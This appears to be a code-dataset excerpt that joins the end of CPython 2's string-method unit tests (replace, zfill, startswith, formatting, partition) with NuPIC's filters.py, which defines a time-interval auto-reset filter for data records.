EQ("cobob", "bobob", "replace", "bob", "cob")
EQ("cobobXcobocob", "bobobXbobobob", "replace", "bob", "cob")
EQ("bobob", "bobob", "replace", "bot", "bot")
# replace single character (len(from)==1, len(to)>1)
EQ("ReyKKjaviKK", "Reykjavik", "replace", "k", "KK")
EQ("ReyKKjaviKK", "Reykjavik", "replace", "k", "KK", -1)
EQ("ReyKKjaviKK", "Reykjavik", "replace", "k", "KK", sys.maxint)
EQ("ReyKKjaviKK", "Reykjavik", "replace", "k", "KK", 2)
EQ("ReyKKjavik", "Reykjavik", "replace", "k", "KK", 1)
EQ("Reykjavik", "Reykjavik", "replace", "k", "KK", 0)
EQ("A----B----C----", "A.B.C.", "replace", ".", "----")
EQ("Reykjavik", "Reykjavik", "replace", "q", "KK")
# replace substring (len(from)>1, len(to)!=len(from))
EQ("ham, ham, eggs and ham", "spam, spam, eggs and spam",
"replace", "spam", "ham")
EQ("ham, ham, eggs and ham", "spam, spam, eggs and spam",
"replace", "spam", "ham", sys.maxint)
EQ("ham, ham, eggs and ham", "spam, spam, eggs and spam",
"replace", "spam", "ham", -1)
EQ("ham, ham, eggs and ham", "spam, spam, eggs and spam",
"replace", "spam", "ham", 4)
EQ("ham, ham, eggs and ham", "spam, spam, eggs and spam",
"replace", "spam", "ham", 3)
EQ("ham, ham, eggs and spam", "spam, spam, eggs and spam",
"replace", "spam", "ham", 2)
EQ("ham, spam, eggs and spam", "spam, spam, eggs and spam",
"replace", "spam", "ham", 1)
EQ("spam, spam, eggs and spam", "spam, spam, eggs and spam",
"replace", "spam", "ham", 0)
EQ("bobob", "bobobob", "replace", "bobob", "bob")
EQ("bobobXbobob", "bobobobXbobobob", "replace", "bobob", "bob")
EQ("BOBOBOB", "BOBOBOB", "replace", "bob", "bobby")
with test_support.check_py3k_warnings():
ba = buffer('a')
bb = buffer('b')
EQ("bbc", "abc", "replace", ba, bb)
EQ("aac", "abc", "replace", bb, ba)
#
self.checkequal('one@two!three!', 'one!two!three!', 'replace', '!', '@', 1)
self.checkequal('onetwothree', 'one!two!three!', 'replace', '!', '')
self.checkequal('one@two@three!', 'one!two!three!', 'replace', '!', '@', 2)
self.checkequal('one@two@three@', 'one!two!three!', 'replace', '!', '@', 3)
self.checkequal('one@two@three@', 'one!two!three!', 'replace', '!', '@', 4)
self.checkequal('one!two!three!', 'one!two!three!', 'replace', '!', '@', 0)
self.checkequal('one@two@three@', 'one!two!three!', 'replace', '!', '@')
self.checkequal('one!two!three!', 'one!two!three!', 'replace', 'x', '@')
self.checkequal('one!two!three!', 'one!two!three!', 'replace', 'x', '@', 2)
self.checkequal('-a-b-c-', 'abc', 'replace', '', '-')
self.checkequal('-a-b-c', 'abc', 'replace', '', '-', 3)
self.checkequal('abc', 'abc', 'replace', '', '-', 0)
self.checkequal('', '', 'replace', '', '')
self.checkequal('abc', 'abc', 'replace', 'ab', '--', 0)
self.checkequal('abc', 'abc', 'replace', 'xy', '--')
# Next three for SF bug 422088: [OSF1 alpha] string.replace(); died with
# MemoryError due to empty result (platform malloc issue when requesting
# 0 bytes).
self.checkequal('', '123', 'replace', '123', '')
self.checkequal('', '123123', 'replace', '123', '')
self.checkequal('x', '123x123', 'replace', '123', '')
self.checkraises(TypeError, 'hello', 'replace')
self.checkraises(TypeError, 'hello', 'replace', 42)
self.checkraises(TypeError, 'hello', 'replace', 42, 'h')
self.checkraises(TypeError, 'hello', 'replace', 'h', 42)
def test_replace_overflow(self):
# Check for overflow checking on 32 bit machines
if sys.maxint != 2147483647 or struct.calcsize("P") > 4:
return
A2_16 = "A" * (2**16)
self.checkraises(OverflowError, A2_16, "replace", "", A2_16)
self.checkraises(OverflowError, A2_16, "replace", "A", A2_16)
self.checkraises(OverflowError, A2_16, "replace", "AA", A2_16+A2_16)
def test_zfill(self):
self.checkequal('123', '123', 'zfill', 2)
self.checkequal('123', '123', 'zfill', 3)
self.checkequal('0123', '123', 'zfill', 4)
self.checkequal('+123', '+123', 'zfill', 3)
self.checkequal('+123', '+123', 'zfill', 4)
self.checkequal('+0123', '+123', 'zfill', 5)
self.checkequal('-123', '-123', 'zfill', 3)
self.checkequal('-123', '-123', 'zfill', 4)
self.checkequal('-0123', '-123', 'zfill', 5)
self.checkequal('000', '', 'zfill', 3)
self.checkequal('34', '34', 'zfill', 1)
self.checkequal('0034', '34', 'zfill', 4)
self.checkraises(TypeError, '123', 'zfill')
# XXX alias for py3k forward compatibility
BaseTest = CommonTest
class MixinStrUnicodeUserStringTest:
# additional tests that only work for
# stringlike objects, i.e. str, unicode, UserString
# (but not the string module)
def test_islower(self):
self.checkequal(False, '', 'islower')
self.checkequal(True, 'a', 'islower')
self.checkequal(False, 'A', 'islower')
self.checkequal(False, '\n', 'islower')
self.checkequal(True, 'abc', 'islower')
self.checkequal(False, 'aBc', 'islower')
self.checkequal(True, 'abc\n', 'islower')
self.checkraises(TypeError, 'abc', 'islower', 42)
def test_isupper(self):
self.checkequal(False, '', 'isupper')
self.checkequal(False, 'a', 'isupper')
self.checkequal(True, 'A', 'isupper')
self.checkequal(False, '\n', 'isupper')
self.checkequal(True, 'ABC', 'isupper')
self.checkequal(False, 'AbC', 'isupper')
self.checkequal(True, 'ABC\n', 'isupper')
self.checkraises(TypeError, 'abc', 'isupper', 42)
def test_istitle(self):
self.checkequal(False, '', 'istitle')
self.checkequal(False, 'a', 'istitle')
self.checkequal(True, 'A', 'istitle')
self.checkequal(False, '\n', 'istitle')
self.checkequal(True, 'A Titlecased Line', 'istitle')
self.checkequal(True, 'A\nTitlecased Line', 'istitle')
self.checkequal(True, 'A Titlecased, Line', 'istitle')
self.checkequal(False, 'Not a capitalized String', 'istitle')
self.checkequal(False, 'Not\ta Titlecase String', 'istitle')
self.checkequal(False, 'Not--a Titlecase String', 'istitle')
self.checkequal(False, 'NOT', 'istitle')
self.checkraises(TypeError, 'abc', 'istitle', 42)
def test_isspace(self):
self.checkequal(False, '', 'isspace')
self.checkequal(False, 'a', 'isspace')
self.checkequal(True, ' ', 'isspace')
self.checkequal(True, '\t', 'isspace')
self.checkequal(True, '\r', 'isspace')
self.checkequal(True, '\n', 'isspace')
self.checkequal(True, ' \t\r\n', 'isspace')
self.checkequal(False, ' \t\r\na', 'isspace')
self.checkraises(TypeError, 'abc', 'isspace', 42)
def test_isalpha(self):
self.checkequal(False, '', 'isalpha')
self.checkequal(True, 'a', 'isalpha')
self.checkequal(True, 'A', 'isalpha')
self.checkequal(False, '\n', 'isalpha')
self.checkequal(True, 'abc', 'isalpha')
self.checkequal(False, 'aBc123', 'isalpha')
self.checkequal(False, 'abc\n', 'isalpha')
self.checkraises(TypeError, 'abc', 'isalpha', 42)
def test_isalnum(self):
self.checkequal(False, '', 'isalnum')
self.checkequal(True, 'a', 'isalnum')
self.checkequal(True, 'A', 'isalnum')
self.checkequal(False, '\n', 'isalnum')
self.checkequal(True, '123abc456', 'isalnum')
self.checkequal(True, 'a1b3c', 'isalnum')
self.checkequal(False, 'aBc000 ', 'isalnum')
self.checkequal(False, 'abc\n', 'isalnum')
self.checkraises(TypeError, 'abc', 'isalnum', 42)
def test_isdigit(self):
self.checkequal(False, '', 'isdigit')
self.checkequal(False, 'a', 'isdigit')
self.checkequal(True, '0', 'isdigit')
self.checkequal(True, '0123456789', 'isdigit')
self.checkequal(False, '0123456789a', 'isdigit')
self.checkraises(TypeError, 'abc', 'isdigit', 42)
def test_title(self):
self.checkequal(' Hello ', ' hello ', 'title')
self.checkequal('Hello ', 'hello ', 'title')
self.checkequal('Hello ', 'Hello ', 'title')
self.checkequal('Format This As Title String', "fOrMaT thIs aS titLe String", 'title')
self.checkequal('Format,This-As*Title;String', "fOrMaT,thIs-aS*titLe;String", 'title', )
self.checkequal('Getint', "getInt", 'title')
self.checkraises(TypeError, 'hello', 'title', 42)
def test_splitlines(self):
self.checkequal(['abc', 'def', '', 'ghi'], "abc\ndef\n\rghi", 'splitlines')
self.checkequal(['abc', 'def', '', 'ghi'], "abc\ndef\n\r\nghi", 'splitlines')
self.checkequal(['abc', 'def', 'ghi'], "abc\ndef\r\nghi", 'splitlines')
self.checkequal(['abc', 'def', 'ghi'], "abc\ndef\r\nghi\n", 'splitlines')
self.checkequal(['abc', 'def', 'ghi', ''], "abc\ndef\r\nghi\n\r", 'splitlines')
self.checkequal(['', 'abc', 'def', 'ghi', ''], "\nabc\ndef\r\nghi\n\r", 'splitlines')
self.checkequal(['\n', 'abc\n', 'def\r\n', 'ghi\n', '\r'], "\nabc\ndef\r\nghi\n\r", 'splitlines', 1)
self.checkraises(TypeError, 'abc', 'splitlines', 42, 42)
def test_startswith(self):
self.checkequal(True, 'hello', 'startswith', 'he')
self.checkequal(True, 'hello', 'startswith', 'hello')
self.checkequal(False, 'hello', 'startswith', 'hello world')
self.checkequal(True, 'hello', 'startswith', '')
self.checkequal(False, 'hello', 'startswith', 'ello')
self.checkequal(True, 'hello', 'startswith', 'ello', 1)
self.checkequal(True, 'hello', 'startswith', 'o', 4)
self.checkequal(False, 'hello', 'startswith', 'o', 5)
self.checkequal(True, 'hello', 'startswith', '', 5)
self.checkequal(False, 'hello', 'startswith', 'lo', 6)
self.checkequal(True, 'helloworld', 'startswith', 'lowo', 3)
self.checkequal(True, 'helloworld', 'startswith', 'lowo', 3, 7)
self.checkequal(False, 'helloworld', 'startswith', 'lowo', 3, 6)
# test negative indices
self.checkequal(True, 'hello', 'startswith', 'he', 0, -1)
self.checkequal(True, 'hello', 'startswith', 'he', -53, -1)
self.checkequal(False, 'hello', 'startswith', 'hello', 0, -1)
self.checkequal(False, 'hello', 'startswith', 'hello world', -1, -10)
self.checkequal(False, 'hello', 'startswith', 'ello', -5)
self.checkequal(True, 'hello', 'startswith', 'ello', -4)
self.checkequal(False, 'hello', 'startswith', 'o', -2)
self.checkequal(True, 'hello', 'startswith', 'o', -1)
self.checkequal(True, 'hello', 'startswith', '', -3, -3)
self.checkequal(False, 'hello', 'startswith', 'lo', -9)
self.checkraises(TypeError, 'hello', 'startswith')
self.checkraises(TypeError, 'hello', 'startswith', 42)
# test tuple arguments
self.checkequal(True, 'hello', 'startswith', ('he', 'ha'))
self.checkequal(False, 'hello', 'startswith', ('lo', 'llo'))
self.checkequal(True, 'hello', 'startswith', ('hellox', 'hello'))
self.checkequal(False, 'hello', 'startswith', ())
self.checkequal(True, 'helloworld', 'startswith', ('hellowo',
'rld', 'lowo'), 3)
self.checkequal(False, 'helloworld', 'startswith', ('hellowo', 'ello',
'rld'), 3)
self.checkequal(True, 'hello', 'startswith', ('lo', 'he'), 0, -1)
self.checkequal(False, 'hello', 'startswith', ('he', 'hel'), 0, 1)
self.checkequal(True, 'hello', 'startswith', ('he', 'hel'), 0, 2)
self.checkraises(TypeError, 'hello', 'startswith', (42,))
def test_endswith(self):
self.checkequal(True, 'hello', 'endswith', 'lo')
self.checkequal(False, 'hello', 'endswith', 'he')
self.checkequal(True, 'hello', 'endswith', '')
self.checkequal(False, 'hello', 'endswith', 'hello world')
self.checkequal(False, 'helloworld', 'endswith', 'worl')
self.checkequal(True, 'helloworld', 'endswith', 'worl', 3, 9)
self.checkequal(True, 'helloworld', 'endswith', 'world', 3, 12)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', 1, 7)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', 2, 7)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', 3, 7)
self.checkequal(False, 'helloworld', 'endswith', 'lowo', 4, 7)
self.checkequal(False, 'helloworld', 'endswith', 'lowo', 3, 8)
self.checkequal(False, 'ab', 'endswith', 'ab', 0, 1)
self.checkequal(False, 'ab', 'endswith', 'ab', 0, 0)
# test negative indices
self.checkequal(True, 'hello', 'endswith', 'lo', -2)
self.checkequal(False, 'hello', 'endswith', 'he', -2)
self.checkequal(True, 'hello', 'endswith', '', -3, -3)
self.checkequal(False, 'hello', 'endswith', 'hello world', -10, -2)
self.checkequal(False, 'helloworld', 'endswith', 'worl', -6)
self.checkequal(True, 'helloworld', 'endswith', 'worl', -5, -1)
self.checkequal(True, 'helloworld', 'endswith', 'worl', -5, 9)
self.checkequal(True, 'helloworld', 'endswith', 'world', -7, 12)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', -99, -3)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', -8, -3)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', -7, -3)
self.checkequal(False, 'helloworld', 'endswith', 'lowo', 3, -4)
self.checkequal(False, 'helloworld', 'endswith', 'lowo', -8, -2)
self.checkraises(TypeError, 'hello', 'endswith')
self.checkraises(TypeError, 'hello', 'endswith', 42)
# test tuple arguments
self.checkequal(False, 'hello', 'endswith', ('he', 'ha'))
self.checkequal(True, 'hello', 'endswith', ('lo', 'llo'))
self.checkequal(True, 'hello', 'endswith', ('hellox', 'hello'))
self.checkequal(False, 'hello', 'endswith', ())
self.checkequal(True, 'helloworld', 'endswith', ('hellowo',
'rld', 'lowo'), 3)
self.checkequal(False, 'helloworld', 'endswith', ('hellowo', 'ello',
'rld'), 3, -1)
self.checkequal(True, 'hello', 'endswith', ('hell', 'ell'), 0, -1)
self.checkequal(False, 'hello', 'endswith', ('he', 'hel'), 0, 1)
self.checkequal(True, 'hello', 'endswith', ('he', 'hell'), 0, 4)
self.checkraises(TypeError, 'hello', 'endswith', (42,))
def test___contains__(self):
self.checkequal(True, '', '__contains__', '')
self.checkequal(True, 'abc', '__contains__', '')
self.checkequal(False, 'abc', '__contains__', '\0')
self.checkequal(True, '\0abc', '__contains__', '\0')
self.checkequal(True, 'abc\0', '__contains__', '\0')
self.checkequal(True, '\0abc', '__contains__', 'a')
self.checkequal(True, 'asdf', '__contains__', 'asdf')
self.checkequal(False, 'asd', '__contains__', 'asdf')
self.checkequal(False, '', '__contains__', 'asdf')
def test_subscript(self):
self.checkequal(u'a', 'abc', '__getitem__', 0)
self.checkequal(u'c', 'abc', '__getitem__', -1)
self.checkequal(u'a', 'abc', '__getitem__', 0L)
self.checkequal(u'abc', 'abc', '__getitem__', slice(0, 3))
self.checkequal(u'abc', 'abc', '__getitem__', slice(0, 1000))
self.checkequal(u'a', 'abc', '__getitem__', slice(0, 1))
self.checkequal(u'', 'abc', '__getitem__', slice(0, 0))
self.checkraises(TypeError, 'abc', '__getitem__', 'def')
def test_slice(self):
self.checkequal('abc', 'abc', '__getslice__', 0, 1000)
self.checkequal('abc', 'abc', '__getslice__', 0, 3)
self.checkequal('ab', 'abc', '__getslice__', 0, 2)
self.checkequal('bc', 'abc', '__getslice__', 1, 3)
self.checkequal('b', 'abc', '__getslice__', 1, 2)
self.checkequal('', 'abc', '__getslice__', 2, 2)
self.checkequal('', 'abc', '__getslice__', 1000, 1000)
self.checkequal('', 'abc', '__getslice__', 2000, 1000)
self.checkequal('', 'abc', '__getslice__', 2, 1)
self.checkraises(TypeError, 'abc', '__getslice__', 'def')
def test_extended_getslice(self):
# Test extended slicing by comparing with list slicing.
s = string.ascii_letters + string.digits
indices = (0, None, 1, 3, 41, -1, -2, -37)
for start in indices:
for stop in indices:
# Skip step 0 (invalid)
for step in indices[1:]:
L = list(s)[start:stop:step]
self.checkequal(u"".join(L), s, '__getitem__',
slice(start, stop, step))
def test_mul(self):
self.checkequal('', 'abc', '__mul__', -1)
self.checkequal('', 'abc', '__mul__', 0)
self.checkequal('abc', 'abc', '__mul__', 1)
self.checkequal('abcabcabc', 'abc', '__mul__', 3)
self.checkraises(TypeError, 'abc', '__mul__')
self.checkraises(TypeError, 'abc', '__mul__', '')
# XXX: on a 64-bit system, this doesn't raise an overflow error,
# but either raises a MemoryError, or succeeds (if you have 54TiB)
#self.checkraises(OverflowError, 10000*'abc', '__mul__', 2000000000)
def test_join(self):
# join now works with any sequence type
# moved here, because the argument order is
# different in string.join (see the test in
# test.test_string.StringTest.test_join)
self.checkequal('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequal('abcd', '', 'join', ('a', 'b', 'c', 'd'))
self.checkequal('bd', '', 'join', ('', 'b', '', 'd'))
self.checkequal('ac', '', 'join', ('a', '', 'c', ''))
self.checkequal('w x y z', ' ', 'join', Sequence())
self.checkequal('abc', 'a', 'join', ('abc',))
self.checkequal('z', 'a', 'join', UserList(['z']))
if test_support.have_unicode:
self.checkequal(unicode('a.b.c'), unicode('.'), 'join', ['a', 'b', 'c'])
self.checkequal(unicode('a.b.c'), '.', 'join', [unicode('a'), 'b', 'c'])
self.checkequal(unicode('a.b.c'), '.', 'join', ['a', unicode('b'), 'c'])
self.checkequal(unicode('a.b.c'), '.', 'join', ['a', 'b', unicode('c')])
self.checkraises(TypeError, '.', 'join', ['a', unicode('b'), 3])
for i in [5, 25, 125]:
self.checkequal(((('a' * i) + '-') * i)[:-1], '-', 'join',
['a' * i] * i)
self.checkequal(((('a' * i) + '-') * i)[:-1], '-', 'join',
('a' * i,) * i)
self.checkraises(TypeError, ' ', 'join', BadSeq1())
self.checkequal('a b c', ' ', 'join', BadSeq2())
self.checkraises(TypeError, ' ', 'join')
self.checkraises(TypeError, ' ', 'join', 7)
self.checkraises(TypeError, ' ', 'join', Sequence([7, 'hello', 123L]))
try:
def f():
yield 4 + ""
self.fixtype(' ').join(f())
except TypeError, e:
if '+' not in str(e):
self.fail('join() ate exception message')
else:
self.fail('exception not raised')
def test_formatting(self):
self.checkequal('+hello+', '+%s+', '__mod__', 'hello')
self.checkequal('+10+', '+%d+', '__mod__', 10)
self.checkequal('a', "%c", '__mod__', "a")
self.checkequal('a', "%c", '__mod__', "a")
self.checkequal('"', "%c", '__mod__', 34)
self.checkequal('$', "%c", '__mod__', 36)
self.checkequal('10', "%d", '__mod__', 10)
self.checkequal('\x7f', "%c", '__mod__', 0x7f)
for ordinal in (-100, 0x200000):
# unicode raises ValueError, str raises OverflowError
self.checkraises((ValueError, OverflowError), '%c', '__mod__', ordinal)
longvalue = sys.maxint + 10L
slongvalue = str(longvalue)
if slongvalue[-1] in ("L","l"): slongvalue = slongvalue[:-1]
self.checkequal(' 42', '%3ld', '__mod__', 42)
self.checkequal('42', '%d', '__mod__', 42L)
self.checkequal('42', '%d', '__mod__', 42.0)
self.checkequal(slongvalue, '%d', '__mod__', longvalue)
self.checkcall('%d', '__mod__', float(longvalue))
self.checkequal('0042.00', '%07.2f', '__mod__', 42)
self.checkequal('0042.00', '%07.2F', '__mod__', 42)
self.checkraises(TypeError, 'abc', '__mod__')
self.checkraises(TypeError, '%(foo)s', '__mod__', 42)
self.checkraises(TypeError, '%s%s', '__mod__', (42,))
self.checkraises(TypeError, '%c', '__mod__', (None,))
self.checkraises(ValueError, '%(foo', '__mod__', {})
self.checkraises(TypeError, '%(foo)s %(bar)s', '__mod__', ('foo', 42))
self.checkraises(TypeError, '%d', '__mod__', "42") # not numeric
self.checkraises(TypeError, '%d', '__mod__', (42+0j)) # no int/long conversion provided
# argument names with properly nested brackets are supported
self.checkequal('bar', '%((foo))s', '__mod__', {'(foo)': 'bar'})
# 100 is a magic number in PyUnicode_Format, this forces a resize
self.checkequal(103*'a'+'x', '%sx', '__mod__', 103*'a')
self.checkraises(TypeError, '%*s', '__mod__', ('foo', 'bar'))
self.checkraises(TypeError, '%10.*f', '__mod__', ('foo', 42.))
self.checkraises(ValueError, '%10', '__mod__', (42,))
width = int(_testcapi.PY_SSIZE_T_MAX + 1)
if width <= sys.maxint:
self.checkraises(OverflowError, '%*s', '__mod__', (width, ''))
prec = int(_testcapi.INT_MAX + 1)
if prec <= sys.maxint:
self.checkraises(OverflowError, '%.*f', '__mod__', (prec, 1. / 7))
# Issue 15989
width = int(1 << (_testcapi.PY_SSIZE_T_MAX.bit_length() + 1))
if width <= sys.maxint:
self.checkraises(OverflowError, '%*s', '__mod__', (width, ''))
prec = int(_testcapi.UINT_MAX + 1)
if prec <= sys.maxint:
self.checkraises(OverflowError, '%.*f', '__mod__', (prec, 1. / 7))
class X(object): pass
self.checkraises(TypeError, 'abc', '__mod__', X())
class X(Exception):
def __getitem__(self, k):
return k
self.checkequal('melon apple', '%(melon)s %(apple)s', '__mod__', X())
def test_floatformatting(self):
# float formatting
for prec in xrange(100):
format = '%%.%if' % prec
value = 0.01
for x in xrange(60):
value = value * 3.14159265359 / 3.0 * 10.0
self.checkcall(format, "__mod__", value)
def test_inplace_rewrites(self):
# Check that strings don't copy and modify cached single-character strings
self.checkequal('a', 'A', 'lower')
self.checkequal(True, 'A', 'isupper')
self.checkequal('A', 'a', 'upper')
self.checkequal(True, 'a', 'islower')
self.checkequal('a', 'A', 'replace', 'A', 'a')
self.checkequal(True, 'A', 'isupper')
self.checkequal('A', 'a', 'capitalize')
self.checkequal(True, 'a', 'islower')
self.checkequal('A', 'a', 'swapcase')
self.checkequal(True, 'a', 'islower')
self.checkequal('A', 'a', 'title')
self.checkequal(True, 'a', 'islower')
def test_partition(self):
self.checkequal(('this is the par', 'ti', 'tion method'),
'this is the partition method', 'partition', 'ti')
# from raymond's original specification
S = 'http://www.python.org'
self.checkequal(('http', '://', 'www.python.org'), S, 'partition', '://')
self.checkequal(('http://www.python.org', '', ''), S, 'partition', '?')
self.checkequal(('', 'http://', 'www.python.org'), S, 'partition', 'http://')
self.checkequal(('http://www.python.', 'org', ''), S, 'partition', 'org')
self.checkraises(ValueError, S, 'partition', '')
self.checkraises(TypeError, S, 'partition', None)
# mixed use of str and unicode
self.assertEqual('a/b/c'.partition(u'/'), ('a', '/', 'b/c'))
def test_rpartition(self):
self.checkequal(('this is the rparti', 'ti', 'on method'),
'this is the rpartition method', 'rpartition', 'ti')
# from raymond's original specification
S = 'http://www.python.org'
self.checkequal(('http', '://', 'www.python.org'), S, 'rpartition', '://')
self.checkequal(('', '', 'http://www.python.org'), S, 'rpartition', '?')
self.checkequal(('', 'http://', 'www.python.org'), S, 'rpartition', 'http://')
self.checkequal(('http://www.python.', 'org', ''), S, 'rpartition', 'org')
self.checkraises(ValueError, S, 'rpartition', '')
self.checkraises(TypeError, S, 'rpartition', None)
# mixed use of str and unicode
self.assertEqual('a/b/c'.rpartition(u'/'), ('a/b', '/', 'c'))
def test_none_arguments(self):
# issue 11828
s = 'hello'
self.checkequal(2, s, 'find', 'l', None)
self.checkequal(3, s, 'find', 'l', -2, None)
self.checkequal(2, s, 'find', 'l', None, -2)
self.checkequal(0, s, 'find', 'h', None, None)
self.checkequal(3, s, 'rfind', 'l', None)
self.checkequal(3, s, 'rfind', 'l', -2, None)
self.checkequal(2, s, 'rfind', 'l', None, -2)
self.checkequal(0, s, 'rfind', 'h', None, None)
self.checkequal(2, s, 'index', 'l', None)
self.checkequal(3, s, 'index', 'l', -2, None)
self.checkequal(2, s, 'index', 'l', None, -2)
self.checkequal(0, s, 'index', 'h', None, None)
self.checkequal(3, s, 'rindex', 'l', None)
self.checkequal(3, s, 'rindex', 'l', -2, None)
self.checkequal(2, s, 'rindex', 'l', None, -2)
self.checkequal(0, s, 'rindex', 'h', None, None)
self.checkequal(2, s, 'count', 'l', None)
self.checkequal(1, s, 'count', 'l', -2, None)
self.checkequal(1, s, 'count', 'l', None, -2)
self.checkequal(0, s, 'count', 'x', None, None)
self.checkequal(True, s, 'endswith', 'o', None)
self.checkequal(True, s, 'endswith', 'lo', -2, None)
self.checkequal(True, s, 'endswith', 'l', None, -2)
self.checkequal(False, s, 'endswith', 'x', None, None)
self.checkequal(True, s, 'startswith', 'h', None)
self.checkequal(True, s, 'startswith', 'l', -2, None)
self.checkequal(True, s, 'startswith', 'h', None, -2)
self.checkequal(False, s, 'startswith', 'x', None, None)
def test_find_etc_raise_correct_error_messages(self):
# issue 11828
s = 'hello'
x = 'x'
self.assertRaisesRegexp(TypeError, r'\bfind\b', s.find,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\brfind\b', s.rfind,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\bindex\b', s.index,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\brindex\b', s.rindex,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'^count\(', s.count,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'^startswith\(', s.startswith,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'^endswith\(', s.endswith,
x, None, None, None)
class MixinStrStringUserStringTest:
# Additional tests for 8bit strings, i.e. str, UserString and
# the string module
def test_maketrans(self):
self.assertEqual(
''.join(map(chr, xrange(256))).replace('abc', 'xyz'),
string.maketrans('abc', 'xyz')
)
self.assertRaises(ValueError, string.maketrans, 'abc', 'xyzw')
def test_translate(self):
table = string.maketrans('abc', 'xyz')
self.checkequal('xyzxyz', 'xyzabcdef', 'translate', table, 'def')
table = string.maketrans('a', 'A')
self.checkequal('Abc', 'abc', 'translate', table)
self.checkequal('xyz', 'xyz', 'translate', table)
self.checkequal('yz', 'xyz', 'translate', table, 'x')
self.checkequal('yx', 'zyzzx', 'translate', None, 'z')
self.checkequal('zyzzx', 'zyzzx', 'translate', None, '')
self.checkequal('zyzzx', 'zyzzx', 'translate', None)
self.checkraises(ValueError, 'xyz', 'translate', 'too short', 'strip')
self.checkraises(ValueError, 'xyz', 'translate', 'too short')
class MixinStrUserStringTest:
# Additional tests that only work with
# 8bit compatible object, i.e. str and UserString
if test_support.have_unicode:
def test_encoding_decoding(self):
codecs = [('rot13', 'uryyb jbeyq'),
('base64', 'aGVsbG8gd29ybGQ=\n'),
('hex', '68656c6c6f20776f726c64'),
('uu', 'begin 666 <data>\n+:&5L;&\\@=V]R;&0 \n \nend\n')]
for encoding, data in codecs:
self.checkequal(data, 'hello world', 'encode', encoding)
self.checkequal('hello world', data, 'decode', encoding)
# zlib is optional, so we make the test optional too...
try:
import zlib
except ImportError:
pass
else:
data = 'x\x9c\xcbH\xcd\xc9\xc9W(\xcf/\xcaI\x01\x00\x1a\x0b\x04]'
self.checkequal(data, 'hello world', 'encode', 'zlib')
self.checkequal('hello world', data, 'decode', 'zlib')
self.checkraises(TypeError, 'xyz', 'decode', 42)
self.checkraises(TypeError, 'xyz', 'encode', 42)
class MixinStrUnicodeTest:
# Additional tests that only work with str and unicode.
def test_bug1001011(self):
# Make sure join returns a NEW object for single item sequences
# involving a subclass.
# Make sure that it is of the appropriate type.
# Check the optimisation still occurs for standard objects.
t = self.type2test
class subclass(t):
pass
s1 = subclass("abcd")
s2 = t().join([s1])
self.assertTrue(s1 is not s2)
self.assertTrue(type(s2) is t)
s1 = t("abcd")
s2 = t().join([s1])
self.assertTrue(s1 is s2)
# Should also test mixed-type join.
if t is unicode:
s1 = subclass("abcd")
s2 = "".join([s1])
self.assertTrue(s1 is not s2)
self.assertTrue(type(s2) is t)
s1 = t("abcd")
s2 = "".join([s1])
self.assertTrue(s1 is s2)
elif t is str:
s1 = subclass("abcd")
s2 = u"".join([s1])
self.assertTrue(s1 is not s2)
self.assertTrue(type(s2) is unicode) # promotes!
s1 = t("abcd")
s2 = u"".join([s1])
self.assertTrue(s1 is not s2)
self.assertTrue(type(s2) is unicode) # promotes!
else:
self.fail("unexpected type for MixinStrUnicodeTest %r" % t)
| mit |
passiweinberger/nupic | src/nupic/data/filters.py | 34 | 4194 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from datetime import datetime, timedelta
class AutoResetFilter(object):
"""Initial implementation of auto-reset is fairly simple. You just give it a
time interval. Like aggregation, we start the first time period with the
time of the first record (t0) and signal a reset at the first record on or
after t0 + interval, t0 + 2 * interval, etc.
We could get much fancier than this, but it is not clear what will be
needed. For example, if you want a reset every day, you might expect the
period to start at midnight. We also don't handle variable-time periods --
month and year.
"""
def __init__(self, interval=None, datetimeField=None):
self.setInterval(interval, datetimeField)
def setInterval(self, interval=None, datetimeField=None):
if interval is not None:
assert isinstance(interval, timedelta)
self.interval = interval
self.datetimeField = datetimeField
self.lastAutoReset = None
def process(self, data):
if self.interval is None:
return True # no more data needed
if self.datetimeField is None:
self._getDatetimeField(data)
date = data[self.datetimeField]
if data['_reset'] != 0:
self.lastAutoReset = date
return True # no more data needed
if self.lastAutoReset is None:
self.lastAutoReset = date
return True
if date >= self.lastAutoReset + self.interval:
# might have skipped several intervals
while date >= self.lastAutoReset + self.interval:
self.lastAutoReset += self.interval
data['_reset'] = 1
return True # no more data needed
elif date < self.lastAutoReset:
# sequence went back in time!
self.lastAutoReset = date
return True
def _getDatetimeField(self, data):
datetimeField = None
assert isinstance(data, dict)
for (name, value) in data.items():
if isinstance(value, datetime):
datetimeField = name
break
if datetimeField is None:
raise RuntimeError("Autoreset requested for the data but there is no date field")
self.datetimeField = datetimeField
def getShortName(self):
if self.interval is not None:
s = "autoreset_%d_%d" % (self.interval.days, self.interval.seconds)
else:
s = "autoreset_none"
return s
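# A minimal usage sketch (illustrative only; 'timestamp' is a hypothetical
# field name -- process() locates whatever datetime field the record carries):
#
# f = AutoResetFilter(interval=timedelta(hours=1))
# rec1 = {'timestamp': datetime(2014, 1, 1, 0, 0), '_reset': 0}
# f.process(rec1) # first record primes lastAutoReset
# rec2 = {'timestamp': datetime(2014, 1, 1, 1, 30), '_reset': 0}
# f.process(rec2) # on or after t0 + interval, so rec2['_reset'] is set to 1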
